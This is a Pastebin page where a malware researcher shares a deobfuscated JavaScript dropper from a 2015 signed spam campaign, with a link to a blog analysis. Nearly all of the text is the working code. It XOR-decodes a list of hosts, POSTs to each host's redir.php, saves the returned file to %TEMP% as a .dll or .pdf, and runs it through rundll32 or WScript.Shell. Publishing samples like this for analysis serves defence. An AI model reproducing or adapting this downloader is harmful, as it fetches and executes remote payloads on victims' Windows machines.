Advertisement
bartblaze

out2.js

Nov 10th, 2015
668
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Deobfuscated JS file. Related blog post: http://bartblaze.blogspot.com/2015/11/a-quick-look-at-signed-spam-campaign.html
  2.  
  3. kTEIfdmieLe8 = "au0911";
  4.  
  5. function kTEIfdmieLe5(kTEIfdmieLe6) {
  6.     return new ActiveXObject(kTEIfdmieLe6)
  7. };
  8. //// r6JLy1ijVPK
  9. //// 9eoOj
  10.  
  11. //// b81c44zCnlGhKEGFeeq
  12. //// rMgXtx1jVd3fR2
  13. function kTEIfdmieLe(jhmpYYZvkuHWkW) {
  14.     var kTEIfdmieLe4 = '9\x1a\x06f\x277w5T(*#E~###7\x19\x1d\x7f!7\x18#(,hd###2\x1d\x04~;)q?*9, \x0f#861\x0b\x0d}"4\x18/5&J\x198Y\x14\x0b\x14, \x5c\x06HB\x04\x1f\x06\x00\x1dg\x00\x05\x05\x0c=)\x1f\x10\x0bY\x0b\x1d\x0e\x17cB###.\x0d\x02`3/y8?\x276@\x0b;:ip###.\x1d\x09w$.e%5%<!\x1dZ4+7UO###3\x0b\x11s<%c 1\x27,#\x09Z86=UO###\x13, A\x13I]\x16wa'.split("###");
  15. //// U2gGxa
  16. //// v5ziPM5Ffk
  17.     if (jhmpYYZvkuHWkW == "") {
  18.         qKLIFbykNgG = "." + "d" + "l" + "l";
  19.     } else {
  20. //// vuh4k5cITe
  21. //// KGZT1FZBTij1b
  22.         qKLIFbykNgG = "." + "p" + "d" + "f";
  23.     };
  24.     for (var kRIBOVzKPU = 0; kRIBOVzKPU < kTEIfdmieLe4.length; kRIBOVzKPU++) {
  25.         var veHnYKIWjraSp = kTEIfdmieLe5("WScript.Shell");
  26. //// nugznF3J0MgFJS6
  27. //// vAjJP
  28.         sxyPxnzNV = veHnYKIWjraSp.ExpandEnvironmentStrings("%TEMP%") + "\\" + Math.round(1e8 * Math.random()) + qKLIFbykNgG;
  29.         bypLmkq = false;
  30.         kTEIfdmieLe0 = kTEIfdmieLe5("MSXML2.XMLHTTP");
  31.         kTEIfdmieLe0.onreadystatechange = function() {
  32.             if (4 == kTEIfdmieLe0.readyState && 200 == kTEIfdmieLe0.status) {
  33.                 var kTEIfdmieLe1 = kTEIfdmieLe5("ADODB.Stream");
  34.                 if (kTEIfdmieLe1.open(), kTEIfdmieLe1.type = 1, kTEIfdmieLe1.write(kTEIfdmieLe0.ResponseBody), 5e3 < kTEIfdmieLe1.size) {
  35.                     bypLmkq = true;
  36.                     kTEIfdmieLe1.position = 0;
  37.                     kTEIfdmieLe1.saveToFile(sxyPxnzNV, 2);
  38.                     try {
  39.                         if (jhmpYYZvkuHWkW == "") {
  40.                             veHnYKIWjraSp.Exec("rundll32 " + sxyPxnzNV + ", " + "DllRegisterServer");
  41.                         } else {
  42.                             veHnYKIWjraSp.Run(sxyPxnzNV, 1, 0);
  43.                         };
  44.                     } catch (kTEIfdmieLe2) {
  45. //// uLwp7f7a4iYX4fySkVO
  46. //// AHd01oKSom
  47.                        
  48.                     };
  49. //// XEJSIvJ50CMlcrXQ8W
  50. //// l9CA25oIEjMlpDI5
  51.                 }
  52.                 kTEIfdmieLe1.close()
  53.             }
  54. //// vBJw1enjn3Wd7NMI
  55. //// FKMKp9Sj
  56.         };
  57.         try {
  58. //// 7bMQQ7rV
  59. //// 0DHAGjKxwXc0lyCHv
  60. //// KiU13559
  61. //// IaR517JKlqQjx2OsWqJs
  62.             var jjxjYcRoh = 'zXE2rg6lzkenHtwd';
  63.             var ICJCJreUdAoEDtN = kTEIfdmieLe4[kRIBOVzKPU];
  64.             for (var byQIHsqp = "", MCwLh6 = 0, MCwLh7 = 0; MCwLh6 < ICJCJreUdAoEDtN.length; MCwLh6++) byQIHsqp += String.fromCharCode(ICJCJreUdAoEDtN.charCodeAt(MCwLh6) ^ jjxjYcRoh.charCodeAt(MCwLh7)), MCwLh7++, MCwLh7 == jjxjYcRoh.length && (MCwLh7 = 0);
  65.             kTEIfdmieLe7 = "http://" + byQIHsqp + "/redir" + "." + "p" + "h" + "p";
  66.             kTEIfdmieLe0.open("POST", kTEIfdmieLe7, false);
  67.             kTEIfdmieLe0.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  68.             kTEIfdmieLe0.send("JreoOoOUJvvFay=" + Math.random() + "&jndj=" + kTEIfdmieLe8 + jhmpYYZvkuHWkW);
  69.         } catch (kTEIfdmieLe3) {
  70.  
  71.         };
  72.  
  73.         if (bypLmkq) {
  74.             break;
  75.         };
  76. //// hqp4kZQUxwE
  77. //// KYrOhQ
  78.     };
  79. };
  80. //// EQr7ksuiuwZdut45a
  81. //// jCStO3r
  82.  
  83. kTEIfdmieLe("");
  84. kTEIfdmieLe("&ncm=sJzHYgdHnDZTwU");
  85. //// AEiSHdZq5
  86. //// nHsVUN2fzi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement